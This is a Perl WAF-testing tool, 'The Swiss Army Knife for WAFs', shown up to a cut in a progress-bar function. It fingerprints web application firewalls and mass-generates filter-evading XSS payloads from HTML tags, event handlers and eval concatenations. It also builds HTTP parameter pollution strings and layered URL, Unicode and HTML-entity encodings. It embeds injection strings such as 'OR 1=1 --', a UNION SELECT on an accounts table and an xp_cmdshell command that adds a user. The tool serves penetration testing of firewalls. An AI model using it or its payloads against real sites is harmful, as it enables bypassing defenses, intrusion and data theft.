#!/usr/bin/perl

my $SCRIPT_NAME = 'The Swiss Army Knife for WAFs';
my $VERSION_NUMBER = '0.9';

sub license ( ) {
	print STDERR << "EOF";

# 	$SCRIPT_NAME
#
# 	Copyright (c) 2011, Frank Block <frank_block@gmx.de>
#
# 	All rights reserved.
#
# 	Redistribution and use in source and binary forms, with or without modification, 
# 	are permitted provided that the following conditions are met:
#
# 	* Redistributions of source code must retain the above copyright notice, this 
# 	  list of conditions and the following disclaimer.
# 	* Redistributions in binary form must reproduce the above copyright notice, 
# 	  this list of conditions and the following disclaimer in the documentation 
# 	  and/or other materials provided with the distribution.
# 	* The names of the contributors may not be used to endorse or promote products 
#         derived from this software without specific prior written permission.
#
# 	THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 
# 	AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 
# 	IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 
# 	ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE 
# 	LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 
# 	DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
# 	SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 
# 	CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 
# 	OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 
# 	OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

EOF
        exit;
}



use strict;
use utf8;
use HTML::Parse;
use HTML::Entities qw(encode_entities encode_entities_numeric);
use URI;
use URI::Escape;
use IO::Socket;
use IO::Select;

our(%args);

select(STDERR); $| = 1;
select(STDOUT); $| = 1;

use constant false => 0;
use constant true  => 1;




##########################################################################################################
#                                                                                                        #
#                                        Generation Variables                                            #
#                                                                                                        #
##########################################################################################################

my $ADDITIONAL_DOUBLE_URL_ENCODE_STRINGS = false;
my $ADDITIONAL_SINGLE_URL_ENCODE_STRINGS = false;
my $ADDITIONAL_STANDARD_URL_ENCODE_STRINGS = false;
my $ADDITIONAL_UNICODE_ENCODE_STRINGS = false;
my $ADDITIONAL_SPECIAL_UNICODE_ENCODE_STRINGS = false;

my @html_tags = qw(     a abbr acronym address applet area article aside audio audioscope b base 
                        basefont bdi bdo bgsound big blackface blink blockquote body bq br button 
                        canvas caption center cite code col colgroup command comment datalist dd 
                        del details dfn dir div dl dt em embed fieldset figcaption figure fn font 
                        footer form frame frameset h1 h2 h3 h4 h5 h6 head header hgroup hr html i 
                        iframe ilayer img input ins isindex kbd keygen label layer legend li 
                        limittext link listing map mark marquee menu meta meter multicol nav nobr 
                        noembed noframes noscript nosmartquotes object ol optgroup option output 
                        p param plaintext pre progress q rp rt ruby s samp script section select 
                        server shadow sidebar small source spacer span strike strong style sub sup 
                        table tbody td textarea tfoot th thead time title tr tt u ul var video wbr 
                        xml xmp n m o pq rst aaaabbbbbccddddeee           );

my @html_event_handlers = qw(   onabort onactivate onafterprint onafterupdate onbeforeactivate 
                                onbeforecopy onbeforecut onbeforedeactivate onbeforeeditfocus 
                                onbeforeonload onbeforepaste onbeforeprint onbeforeupdate onblur 
                                oncanplay oncanplaythrough oncellchange onchange onclick 
                                oncontextmenu oncontrolselect oncopy oncut ondataavailable 
                                ondatasetchanged ondatasetcomplete ondblclick ondeactivate 
                                ondrag ondragend ondragenter ondragleave ondragover ondragstart 
                                ondrop ondurationchange onemptied onended onerror onerrorupdate 
                                onfilterchange onfocus onfocusin onfocusout onformchange 
                                onforminput onhaschange onhelp oninput oninvalid onkeydown 
                                onkeypress onkeyup onlayoutcomplete onload onloadeddata 
                                onloadedmetadata onloadedstart onlosecapture onmessage 
                                onmousedown onmouseenter onmouseleave onmousemove onmouseout 
                                onmouseover onmouseup onmousewheel onmove onmoveend onmovestart 
                                onoffline ononline onpagehide onpageshow onpaste onpause onplay 
                                onplaying onpopstate onprogress onpropertychange onratechange 
                                onreadystatechange onredo onreset onresize onresizeend 
                                onresizestart onrowenter onrowexit onrowsdelete onrowsinserted 
                                onscroll onseeked onseeking onselect onselectstart onstalled 
                                onstorage onsubmit onsuspend ontimeerror ontimeupdate onundo 
                                onunload onvolumechange onwaiting style         );

my @html_string_scriptCode = qw(        alert document.write prompt     );

#~ my @html_url_scriptCode = qw(           location.href           );

my @javascript_strings = qw(            12345           );



##########################################################################################################
#                                                                                                        #
#                                        Fingerprint Variables                                           #
#                                                                                                        #
##########################################################################################################

my $BASIC_USER_AGENT_STRING = "User-Agent: Mozilla/5.5 (compatible; MSIE 5.5; Windows NT 5.1)\r\n";
my $BASIC_ACCEPT_STRING = "Accept: */*\r\n";
my $NO_RESPONSE_STRING = 'NO RESPONSE';
my $CONNECTION_DROPPED = 'CONNECTION DROPPED';
my $SPECIALITIES_RESULT_SEPERATOR_STRING = '        ';
my $SPECIALITIES_RESULT_SEPERATOR_STRING_POSITIVE = '++++++++ ';
my $NO_SPECIAL_BEHAVIOUR_DETECTED = 'No specific behaviour detected';
my $SUCCESSFUL_TESTS_STRING = 'successful_tests';
my $MULTIPLE_RETURNCODES_DISCOVERED_STRING = 'multiple_returncodes';
my $BASE_PHPIDS_CHECK_STRING = 'base_phpids_check';
my $BASE_EMPTY_HTTP_RESPONSE_CHECK_STRING = 'base_empty_http_response_check';
my $BARRACUDA = 'Barracuda';
my $MODSEC = 'Modsecurity';
my $PHPIDS = 'PHPIDS';
my $URLSCAN = 'URLScan';
my $WEBKNIGHT = 'WebKnight';
my $GENERAL = 'General Teststrings';
my $HTTP_PROXY;
my $PHASE_ZERO_BADSTRING = 'cmd.exe';
my $VERBOSE_MODE;

my @barracuda_FP_strings = qw?          script:
                                        script:onmousemove)
                                        cmd'
                                        /*null
                                        cmd+//
                                        /exec()
                                        union#/*#
                                        blackface%20onactivate%3d(1)
                                        body%20onscroll%3d(1)
                                        keygen%20oncut%3d(1)
                                ?;

my @modsec_FP_strings = qw?             ---
                                        ----
                                        ;cmd
                                        union*select
                                        nosmartquotesalert(1)
                                        multicolalert(1)
                                        fieldsetalert(1)
                                        8select///
                                        1=1'
                                        )prompteval(
                                ?;

my @phpids_FP_strings = qw?             ;///
                                        --
                                        blockquotedocument.write(1)
                                        audioscopedocument.write(1)
                                        h6prompt(1)
                                        =alert:/
                                        cookie{:/
                                        =document==
                                        @@-//
                                        1and-*
                                ?;

my @urlscan_FP_strings = qw(            %3c
                                        %3e
                                        %3c1nothing1%3e
                                        %3c1asd%3e
                                        %3c%3c%3c%3c
                                        %3e%3e%3e%3e
                                        ab%3ecd
                                        %3c9orandnull%3e
                                        %3e%3c%3e
                                        aaa%3c
                                );

my @webknight_FP_strings = qw?          selectexec
                                        execxp_regread
                                        nullselect'-
                                        )"a'
                                        fromnull"=
                                        onmouseoutsrccookie"
                                        )cookieonkeypress=
                                        src"%26:
                                        scriptonmouseout=%26
                                        srconkeypress=src
                                ?;

my @general_FP_strings = qw?    %3Cscript%3Ealert(1)%3C/script%3E
                                %27%20UNION%20SELECT%20*%20FROM%20ACCOUNTS%20--
                                %27%20OR%201=1%20--
                                %27;%20exec%20master..xp_cmdshell%20%27net%20user%20malicious%20/add%27%20--
                        ?;


my %waf_FP_stringArrays = (     $BARRACUDA => \@barracuda_FP_strings,
                                $MODSEC => \@modsec_FP_strings, 
                                $PHPIDS => \@phpids_FP_strings, 
                                $URLSCAN => \@urlscan_FP_strings, 
                                $WEBKNIGHT => \@webknight_FP_strings, 
                                $GENERAL => \@general_FP_strings 
                        );



##########################################################################################################
#                                                                                                        #
#                                        Main Functions                                                  #
#                                                                                                        #
##########################################################################################################

sub init ( ) {
        usage() if ($#ARGV == -1);
        use Getopt::Std;
        getopts('haAVvFulLcUnNdeoD:E:s:i:I:S:O:p:P:rRx:', \%args);
        usage() if $args{h};


        $ADDITIONAL_STANDARD_URL_ENCODE_STRINGS = true if $args{d};
        $ADDITIONAL_SINGLE_URL_ENCODE_STRINGS = true if $args{u};
        $ADDITIONAL_DOUBLE_URL_ENCODE_STRINGS = true if $args{U};
        $ADDITIONAL_UNICODE_ENCODE_STRINGS = true if $args{n};
        $ADDITIONAL_SPECIAL_UNICODE_ENCODE_STRINGS = true if $args{N};
        $HTTP_PROXY = URI->new($args{O}) if $args{O};
        $VERBOSE_MODE = $args{v} ? true : false;
        my $appendClosingTag = $args{c} ? true : false;
        
        if ($args{i} || $args{I}){                # INPUT THAT SHOULD BE ENCODED OR SOMEHOW ELSE PROCESSED
                my $lines;
                my @temp;
                
                if ( $args{i} ) {
                        @temp = split(/,/, $args{i}) if $args{i};
                        $lines = \@temp;
                }
                else {
                        $lines = getStringArrayFromFile($args{I});
                        $lines = preFiltering($lines,$args{S},$args{R}) if $args{S};
                }

                if ($args{E} && $args{x}){        # REPLACE STRING x WITH ENCODINGS
                        my $encodings = getStringArrayFromFile($args{E});
                        
                        $lines = preFiltering($lines,$args{s},$args{r}) if $args{s};
                
                        printArray(&processSourceFile($encodings,$lines,$args{x}));
                }

                elsif ( $args{p} || $args{P} ){   # HTTP PARAMETER POLLUTION/FRAGMENTATION
                        my $temp;
                        if ($args{p}){
                                $temp = hpp_hpf($lines,$args{p});
                                printArray($temp);

                                if ($args{e}){
                                        startEncode($temp);
                                }
                                else {
                                        printArrayEncoded($temp);
                                }
                                        
                        }
                        if ($args{P}){
                                my @params = split(/,/, $args{P});
                                $temp = hpp_hpf($lines,\@params);
                                printArray($temp);

                                if ($args{e}){
                                        startEncode($temp);
                                }
                                else {
                                        printArrayEncoded($temp);
                                        
                                }
                        }
                }

                elsif ( $args{V} ){                # CREATION OF HTML STRINGS WITH JAVASCRIPT METHODS, AND IF SELECTED ADDITIONAL ENCODING
                        my $tempHtml = createHtmlStrings(\@html_tags, \@html_event_handlers, $lines, $appendClosingTag);
                        my $tempEvalHtml = createHtmlStrings(\@html_tags, \@html_event_handlers, 'eval', $appendClosingTag, stringConcatenateVariations($lines)) if $args{a};
                        
                        if ( $args{e} ){
                                startEncode($tempHtml);
                                startEncode($tempEvalHtml) if $args{a};
                        }
                        else {
                                printArray($tempHtml);
                                printArray($tempEvalHtml) if $args{a};
                                if ( $args{d} || $args{u} || $args{U} || $args{n} || $args{N} ) {
                                        printArrayEncoded($tempHtml);
                                        printArrayEncoded($tempEvalHtml) if $args{a};
                                }
                        }
                }

                elsif ( $args{e} ){                # ENCODING WITH SELECTED METHODS
                        startEncode($lines);
                }

                elsif ( $args{d} || $args{u} || $args{U} || $args{n} || $args{N} ){
                        printArrayEncoded($lines);
                }
                
                elsif ( $args{D} ) {
                        printArrayUriDecoded($lines, $args{D});
                }                        
                
                elsif ( $args{F} ) {         # START FINGERPRINTING
                        fingerprintTarget($lines);
                }

                else {
                        die 'There are not enough parameters provided, for more info try -h';
                }
        }

        elsif ( $args{A} ){
                my $tempHtml = createHtmlStrings(\@html_tags, \@html_event_handlers, \@html_string_scriptCode, $appendClosingTag, \@javascript_strings);
                my $tempEvalHtml = createHtmlStrings(\@html_tags, \@html_event_handlers, 'eval', $appendClosingTag, stringConcatenateVariations(joinTwoScriptArrays(\@html_string_scriptCode, \@javascript_strings))) if $args{a};
                
                if ( $args{e} ){
                        startEncode($tempHtml);
                        startEncode($tempEvalHtml) if $args{a};
                }
                else {
                        printArray($tempHtml);
                        printArray($tempEvalHtml) if $args{a};
                        if ( $args{d} || $args{u} || $args{U} || $args{n} || $args{N} ) {
                                printArrayEncoded($tempHtml);
                                printArrayEncoded($tempEvalHtml) if $args{a};
                        }
                }
        }

        elsif ( $args{o} ){ # Printing of pre defined arrays
                printInternals();
        }
        
        elsif ( $args{l} ) {
                print("\n");
                printSupportedWafs();
        }
        
        elsif ( $args{L} ) {
                license();
        }

        else {
                die 'There are not enough parameters provided, for more info try -h';
        }
        exit;
}


sub usage ( ) {
        print STDERR << "EOF";

$SCRIPT_NAME v.$VERSION_NUMBER
====================================================================================

This script is capable of:
- Fingerprinting different WAFs
- Creation of HTTP Parameter Pollution and HTTP Parameter Fragmentation Strings
- HTML Code Generation with provided Scriptcode
- Different Encoding techniques



usage: $0 -i inputString | -I inputTextfile ...

-h      : Print this help
-i      : the source string(s) for encoding
-I      : the text file containing the source strings for encoding
-S      : a string that tags/is contained in the relevant source text lines
-R      : boolean flag if the filter string should be removed from the text 
          strings (in case it is just a tag, marking relevant lines)
-e      : using this flag will apply multiple encodings on the normal output
          (might produce duplicate lines, depending on input)
-E      : the text file containg the encoding strings for replacement
-s      : a string that tags/is contained in the relevant encoding lines
-r      : boolean flag if the filter string should be removed from the 
          encoding strings (in case it is just a tag, marking relevant lines)
-x      : the string that should be replaced with the encodings
-V      : creation of html tags with eventhandlers and the scriptcode supplied
-A      : does the same as -V but with internal scriptcodes
-a      : additional to the output from -V or -A the eval function is used in combination with the scriptCode
-c      : appends the closing tag for the output of -V or -A
-e      : encode the output with several encoding methods
-d      : additional standard url encode all encoded strings         (only special characters will be url encoded)
-u      : additional single url encode all encoded strings         (all characters will be url encoded)
-U      : additional double url encode all encoded strings
-n      : additional unicode encoding
-N      : additional special unicode encoding
-D      : specifies the number of times the given input should be URL decoded
-O      : Set a proxy (e.g. http://127.0.0.1:8080 )
-p      : the parameter name used for HTTP Parameter Pollution. (only working for ASP/IIS,Axis 2400 and DBman maybe. see HPP OWASP 09)
-P      : the comma seperated list containing the paramertes used for HTTP Parameter Fragmentation
-F      : start fingerprinting the target for a WAF
-v      : activates Verbose Mode for Fingerprinting
-o      : prints the internal Arrays
-l      : print supported WAFs
-L      : show license




Example usage:
-------------------------
Standard functions

$0 -I text.txt -E encodings.txt -x \\<
will replace all occurences of < in the text file with each string in encodings.txt

$0 -I text.txt -E encodings.txt -x \\< -s #enc# -r
only encoding strings containing the tag #enc# will be used, and the string #enc# will be removed

$0 -I text.txt -E encodings.txt -x \\< -S script
only text lines containing "script" will be used for replacement, the string "script" remains

$0 -i stringToBeEncoded,anotherString -e
applys several encodings

$0 -i stringToBeEncoded -e -d
applys several encodings, and additionally encodes every string with standard url encoding

$0 -i stringToBeEncoded -U
applys only double url encoding

$0 -I stringsToBeDecoded -D 3
processes 3 iterations URL decoding


-------------
Code Generation
$0 -i "or 1=1 --" -p input
HPP

$0 -i "' or 1=1 --" -P username,password
HPF

$0 -i alert(1) -V

$0 -I scriptCodeFile -V -a
does additionaly different eval variations on the supplied scriptCodes

$0 -A -d

$0 -A -a -e -d


------------
Fingerprinting

$0 -i http://10.0.0.1:8080 -F

$0 -i http://10.0.0.1/page.php,http://www.google.de -F

$0 -i http://10.0.0.1/page.php?message=a -F
this variation is needed to successfull detect $PHPIDS

$0 -I fileContainingUrls -F -O http://myproxy:3128
====================================================================================

EOF
        exit;
}


#
# this method prints the content of an array, each element in a new line
#
# first argument is the array that should be printed
#
sub printArray ( $ ) {
        foreach my $i (@{$_[0]}) {
                print "$i\n";
        }
}


#
# this method prints information about internal data, like used array and Fingerprinting teststrings
#
sub printInternals ( ) {
        print "Arrays used for the HTML Tag creation functions:\n";
        print "------------------------------------------------\n";
        print "\n";
        print "HTML Tags:\n";
        print "----------\n";
        printArray(\@html_tags);
        print "\n";
        print "HTML Event Handlers:\n";
        print "--------------------\n";
        printArray(\@html_event_handlers);
        print "\n";
        print "JavaScript Methods:\n";
        print "-------------------\n";
        printArray(\@html_string_scriptCode);
        print "\n";
        print "JavaScript Strings:\n";
        print "-------------------\n";
        printArray(\@javascript_strings);
        print "\n\n\n";
        print "WAF Fingerprinting specific data:\n";
        print "------------------------------------------------\n\n";
        printWafSpecifics();
        
}


#
# this methos prints the teststrings for each WAF used for Fingerprinting
#
sub printWafSpecifics ( ) {
        printSupportedWafs();
        print "Arrays used for fingerprinting WAFs:\n";
        print "---------------------------------\n\n";
        foreach ( keys %waf_FP_stringArrays ) {
                print "$_ Strings:\n";
                print "-------------------\n";
                printArray(\@{$waf_FP_stringArrays{$_}});
                print("\n");
        }
}


#
# this method prints the WAFs supported by the Fingerprint function
#
sub printSupportedWafs ( ) {
        print "Supported WAFs:\n";
        print "-------------------\n";
        foreach (keys %waf_FP_stringArrays){
                next if ( $_ eq $GENERAL );
                print $_;
                print '  (EXPERIMENTAL)' if ( $_ eq $PHPIDS);
                print "\n";
        }
        print "\n\n";
}


#
# this method returns a string array, read from the specified file
#
# first argument is a string, specifying the file that should be loaded
#
sub getStringArrayFromFile ( $ ) {
        if ( -e $_[0] ) {
                open FILE, '<', $_[0] or die "Error while opening hosts File (\"$_[0]\"): $!";
                my (@lines) = <FILE>;
                close FILE;
                foreach my $line (@lines){
                        chomp($line);
                }

                return \@lines;
        }
        else {
                die "Error while opening xss File (\"$_[0]\"): File doesnt exist";
        }
}




##########################################################################################################
#                                                                                                        #
#                                        Generator Functions                                             #
#                                                                                                        #
##########################################################################################################


#
# this method prints the content of an array, applying specified encodings
#
# first argument is the array that should be encoded
#
sub printArrayEncoded ( $ ) {
        my $input = $_[0];
        my @tempInput;
        if ( !ref($input) ){
                push(@tempInput, $input);
                $input = \@tempInput;
        }

        foreach my $i (@{$input}) {
                print(uri_escape_utf8($i) . "\n") if $ADDITIONAL_STANDARD_URL_ENCODE_STRINGS;
                print(uri_escape_utf8($i, "\0-\377") . "\n") if $ADDITIONAL_SINGLE_URL_ENCODE_STRINGS;
                print(uri_escape_utf8(uri_escape_utf8($i, "\0-\377")) . "\n") if $ADDITIONAL_DOUBLE_URL_ENCODE_STRINGS;
                print(encodeUnicode($i) . "\n") if $ADDITIONAL_UNICODE_ENCODE_STRINGS;
                print(encodeUnicode($i, true) . "\n") if $ADDITIONAL_SPECIAL_UNICODE_ENCODE_STRINGS;
        }
}


#
# this method prints the content of an array and decodes the elements X times
#
# first argument is the array that should be decoded
# second argument is the number of times, the decoding should be applied
#
sub printArrayUriDecoded ( $$ ) {
        my $input = $_[0];
        my $iterations = $_[1];
        my @tempInput;
        my $tempOutput = '';
        if ( !ref($input) ){
                push(@tempInput, $input);
                $input = \@tempInput;
        }

        foreach my $i (@{$input}) {
                $tempOutput = $i;
                for (my $j = 0; $j < $iterations; $j++) {
                        $tempOutput = uri_unescape($tempOutput);
                }
                print($tempOutput . "\n");
        }
}


#
# this method filters relevant lines out of string arrays
#
# first argument is the string array
# second argument is the string that marks relevant lines
# the third argument is an optional flag for removing the filterstring
#
sub preFiltering ( $$$ ) {
        my @result;
        my @stringArray = @{$_[0]};
        my $filterString = $_[1];
        my $removeFilterString = $_[2];
        foreach my $i (@stringArray) {
                if ($i =~ $filterString) {
                        $i =~ s/\Q$filterString// if $removeFilterString;
                        push(@result,$i);
                }
        }

        return \@result;
}


#
# main encoding method
# processes the text and encodings stringArrays (got from files)
#
sub processSourceFile ( $$$ ) {

        my $encodings= $_[0];
        my $lines = $_[1];
        my $stringToBeReplaced = $_[2];
        my @result;
        if (ref($lines)){
                foreach my $i (@{$lines}){
                        push(@result, &replace($encodings,$i,$stringToBeReplaced));
                }
        }
        else {
                push(@result, &replace($encodings,$lines,$stringToBeReplaced));
        }
        
        return \@result;
}


#
# this method replaces the specified symbol in the actual line of the text file with each encoding
#
# first argument is the encoding array
# second argument is the string, containing the string, that should be replaced
# third argument specifies the string, that should be replaced
#
sub replace ( $$$ ) {

        my $encodings = $_[0];
        my $actualLine = $_[1];
        my $stringToBeReplaced = $_[2];
        my @result;
        my $temp;

        foreach my $i (@{$encodings}){
                $temp = $actualLine;
                $temp =~ s/\Q$stringToBeReplaced/$i/g;
                push(@result, $temp);
        }
        return @result;
}


#
# this method produces the Tag - EventHandler - Script combinations, also refered to as XSS generator
#
# first argument is the tag(s) to be used
# second argument is the event handler(s) to be used
# third argument is the java scrip method to be used
# fourth argument is a flag, which toggles the appending of the closing tag
# fifth argument is optional, and specifies addition javascript code, which will be included in the third argument
#
sub createHtmlStrings ( $$$$@ ) {
        my $tags = $_[0];
        my @tempTags;
        my $methods = $_[1];
        my @tempMethods;
        my $javascript_methods = $_[2];
        my @tempJSMethods;
        my $appendClosingTag = $_[3];
        my $javascript_strings = $_[4] if $_[4];
        my @tempJSStrings;
        my @result;
        my $closingTag;
        my $appendString = 'asd';
        if ( !ref($tags) ){
                push(@tempTags, $tags);
                $tags = \@tempTags;
        }
        if ( !ref($methods) ){
                push(@tempMethods, $methods);
                $methods = \@tempMethods;
        }
        if ( !ref($javascript_methods) ){
                push(@tempJSMethods, $javascript_methods);
                $javascript_methods = \@tempJSMethods;
        }
        if ( !ref($javascript_strings) ){
                push(@tempJSStrings, $javascript_strings);
                $javascript_strings = \@tempJSStrings;
        }

        foreach my $tag (@{$tags}){
                $closingTag = $appendClosingTag ? "</$tag>" : '';
                foreach my $method (@{$methods}){
                        foreach my $javascript (@{$javascript_methods}){
                                if ($_[4]){
                                        foreach my $javascript_strings (@{$javascript_strings}){
                                                if ( $method eq 'style' ) {
                                                        push(@result, "<$tag $method=x:expression($javascript($javascript_strings))>$appendString$closingTag");
                                                }
                                                else {
                                                        push(@result, "<$tag $method=$javascript($javascript_strings)>$appendString$closingTag");
                                                }
                                        }
                                }
                                elsif ( $method eq 'style' ) {
                                        push(@result, "<$tag $method=x:expression($javascript)>$appendString$closingTag");
                                }
                                else {
                                        push(@result, "<$tag $method=$javascript>$appendString$closingTag");
                                }
                                
                                
                        }
                }
        }
        return \@result;
}


#
# unicode encodes a given char
#
# first argument is the char that should be encoded
#
sub encodeUnicodeChar ( $ ) {
        my $char = $_[0];
        utf8::upgrade($char);
        utf8::decode($char);
        return sprintf "%04x", ord $char;
}


#
# this method prints the special encodings for the given input
#
# first argument are the strings that should be encoded
#
sub startEncode ( $ ) {
        my $input = $_[0];

        if ( ref($input) ){
                foreach my $cur (@{$input}){
                        printArray(encodeString($cur));
                }
        }
        else {
                printArray(encodeString($input));
        }
}


#
# this method returns the special encodings for the given input
#
# first argument is the string that should be encoded
#
sub encodeString ( $ ) {
        my @tempArray;
        my @result;
        my $input = $_[0];
        my $temp = '';

        push(@tempArray, uri_escape_utf8($input));              #escapes only 10% (unsafe chars)
        $temp = uri_escape_utf8($input, "\0-\377");             #escapes all chars
        push(@tempArray, $temp);
        $temp =~ tr/A-F/a-f/;
        push(@tempArray, $temp);
        push(@tempArray, encode_entities($input));

        $temp = encode_entities($input, "\0-\377");
        push(@tempArray, $temp);
        $temp =~ tr/a-z/A-Z/;
        push(@tempArray, $temp);
        $temp =~ tr/A-Z/a-z/;
        push(@tempArray, $temp);
        $temp =~ s/;//g;
        push(@tempArray, $temp);
        $temp =~ tr/a-z/A-Z/;
        push(@tempArray, $temp);

        push(@tempArray, encode_entities_numeric($input));

        $temp = encodeUnicode($input);
        push(@tempArray, $temp);
        $temp =~ tr/a-f/A-F/;
        push(@tempArray, $temp);
        $temp =~ s/%/\\/g;
        push(@tempArray, $temp);
        $temp =~ tr/A-F/a-f/;
        push(@tempArray, $temp);
        

        $temp = encodeUnicode($input, 1);
        push(@tempArray, $temp);
        $temp =~ tr/a-f/A-F/;
        push(@tempArray, $temp);
        $temp =~ s/%/\\/g;
        push(@tempArray, $temp);
        $temp =~ tr/A-F/a-f/;
        push(@tempArray, $temp);
        push(@tempArray, @{encodeHtmlNumeric($input)});

        push(@result, $input);
        foreach my $cur (@tempArray){
                push(@result, $cur);
                push(@result, uri_escape_utf8($cur)) if $ADDITIONAL_STANDARD_URL_ENCODE_STRINGS;
                push(@result, uri_escape_utf8($cur, "\0-\377")) if $ADDITIONAL_SINGLE_URL_ENCODE_STRINGS;
                push(@result, uri_escape_utf8(uri_escape_utf8($cur, "\0-\377"))) if $ADDITIONAL_DOUBLE_URL_ENCODE_STRINGS;
                push(@result, encodeUnicode($cur)) if $ADDITIONAL_UNICODE_ENCODE_STRINGS;
                push(@result, encodeUnicode($cur, true)) if $ADDITIONAL_SPECIAL_UNICODE_ENCODE_STRINGS;
        }

        return \@result;
}


#
# this method unicode encodes a complete string
#
# first argument are the strings that should be encoded
# second argument is a optional flag, toggling a special unicode encoding
#
sub encodeUnicode ( $@ ) {
        my $string = $_[0];
        my @chars = split(//,$string);
        my $result = '';

        
        if ($_[1]){
                foreach my $char (@chars){
                        if ($char =~ '[^ \\\/"\'><%@]'){
                                $char = hex(encodeUnicodeChar($char));
                                $char += 0xFEE0 if $_[1];
                                $result.='%u'.sprintf("%04x", $char);
                        }
                        elsif ($char =~ '[/\\\]'){
                                $result .= $char =~'/' ? '%u2215' : '%u2216';
                        }
                        else {
                                $result.='%u'.encodeUnicodeChar($char);
                        }
                }
        }
        else {
                foreach my $char (@chars){
                        $result.='%u'.encodeUnicodeChar($char);
        
                }
        }
        return $result;
}

#
# this method creates only numeric html encodings for the given input
#
# first argument is the string that should be encoded
#
sub encodeHtmlNumeric ( $ ) {
        my $input = $_[0];
        my @result;
        my @encodedStrings;
        my $decEncodingString = '&#';
        my $hexEncodingString = '&#x';
        my $hexEncoded = encode_entities_numeric($input, "\0-\377");
        my $decEncoded = '';
        my @hexVals;
        my @hexValsChars;
        my $encodedTemp = $hexEncoded;
        my @decVals;
        my @zeroStrings = ('' , '0' , '00' , '000' , '0000' , '00000');
        my $pushResult = 0;
        my $pushEncoded = 0;
        my $printEncodedArray = 0;
        my $printFirstLoop = 0;

        push(@encodedStrings, $hexEncoded);
        
        $encodedTemp = $hexEncoded;

        $encodedTemp =~ tr/x/X/;
        push(@encodedStrings, $encodedTemp);

        $encodedTemp =~ tr/A-Z/a-z/;
        push(@encodedStrings, $encodedTemp);

        $encodedTemp =~ tr/x/X/;
        push(@encodedStrings, $encodedTemp);

        foreach my $curEncoded (@encodedStrings){
                foreach my $zeroString (@zeroStrings){
                        $encodedTemp = $curEncoded;
                        $encodedTemp =~ s/($hexEncodingString)(.*?);/$1$zeroString$2;/ig;
                        push(@result, $encodedTemp);
                        $encodedTemp =~ s/;//g;
                        push(@result, $encodedTemp);
                }
        }

        
        $encodedTemp = $hexEncoded;
        $encodedTemp =~ s/;//g;
        @hexVals = split('&#x', $encodedTemp);
        shift(@hexVals);

        foreach my $cur (@hexVals){
                $decEncoded .= $decEncodingString . hex($cur) . ';';
        }

        foreach my $zeroString (@zeroStrings){
                $encodedTemp = $decEncoded;
                $encodedTemp =~ s/$decEncodingString(.*?);/$decEncodingString$zeroString$1;/g;
                push(@result, $encodedTemp);
                $encodedTemp =~ s/;//g;
                push(@result, $encodedTemp);
        }
        
        return \@result;
}


#
# this method creates either HPP or HPF code, depending on the type of the second parameter
# if the second param supplied is a SCALAR (string) this method results in hpp
# if the second param supplied is an ARRAY (of strings) this method results in hpf
#
# first argument is the input string
# second argument is/are the parameter(s)
#
sub hpp_hpf ( $$ ) {

        my $injectionString = $_[0];
        my $param = $_[1];
        my @resultArray;
        my $result = '';
        my @strings;
        my @tempInjectionStrings;

        if ( !ref($injectionString) ){
                push(@tempInjectionStrings, $injectionString);
                $injectionString = \@tempInjectionStrings;
        }


        foreach my $injString (@{$injectionString}){
                @strings = split(/ /, $injString);
                $result = '';
                if ( ref($param) ){
                        if ( @{$param} <= ($#strings+1) ){
                                my $i = 0;
                                foreach my $p (@{$param}){
                                        $result .= "$p=*/" . $strings[$i] . '/*&';
                                        $i++;
                                }
        
                                $result =~ s/\/\*&$//;
        
                                if ( $#strings >= $i ){
                                        for ( ; $i <= $#strings ; $i++ ){
                                                $result .= ' ' . $strings[$i];
                                        }
                                }
                        }
                        else {
                                die "There are more params given than the string can be splitted in.";
                        }
                }
                else {
                        foreach my $temp (@strings){
                                $result .= "$param=*/$temp/*&";
                        }
                        $result =~ s/\/\*&$//;
                }
                if ( $injectionString =~ / $/ ){
                        $result =~ s/$/ /;
                }
                
                $result =~ s/\*\///;
                push(@resultArray,$result);
        }


        return \@resultArray;
}

#
# this method puts 2 arrays containing scriptcode and scriptstrings together with brackets and returns the resulting array
#
# first argument is the array pointer for the outside scriptcode
# second argument is the array pointer for the inside scriptcode
#
sub joinTwoScriptArrays ( $$ ) {
        my @result;
        foreach my $firstString ( @{$_[0]} ) {
                foreach my $secondString ( @{$_[1]} ) {
                        push(@result, $firstString . '(' . $secondString . ')');
                }
        }
        return \@result;
}


#
# this method provides string variations for createHtml function for usage with 'eval'
# it seperates the given string on specific positions and builds a concatenation
# returns an array of string variations build from input
#
# first argument is a single string or an array of strings
#
sub stringConcatenateVariations ( $ ) {
        my $stringThatWillBeEvaluated = $_[0];
        my @result;
        my $tempString = '';
        my $komma;
        my @steps;


        foreach my $string (@{$stringThatWillBeEvaluated}){
                @steps = ( 1 , 2 , 3 , (int(length($string)/2) + 1));
                $komma = ($string =~ m/"/) ? "'" : '"';
                
                foreach my $step (@steps){
                        $tempString = '';
                        for ( my $i = 0; $i < length($string); $i += $step){
                                $tempString .= $komma . substr($string, $i, $step) . "$komma%2b";
                        }
                        
                        $tempString =~ s/\%2b$//;
                        push(@result, $tempString);
                }
        }
        return \@result;
}


##################################################################################################################################
#                                                                                                                                #
#                                                Fingerprint functions                                                           #
#                                                                                                                                #
##################################################################################################################################



#
# prints a barometer representing the given percentage
#
# first argument is a number between 0 and 100
#
sub printPercentageBar ( $ ) {
        my $percentage = $_[0];
        my $barometerString = '';

        if ( ( $percentage >= 0 ) && ( $percentage <= 100 ) ) {
                for ( my $i = 0; $i < 5; $i++ ) {
                        if ( $percentage >= 20 ) {
                                $barometerString = "|##|\n" . $barometerString;
                                $percentage -= 20;
                        }
                        elsif ( $percentage >= 10 ) {
                                $barometerString = "| #|\n" . $barometerString;
                                $percentage -= 10;
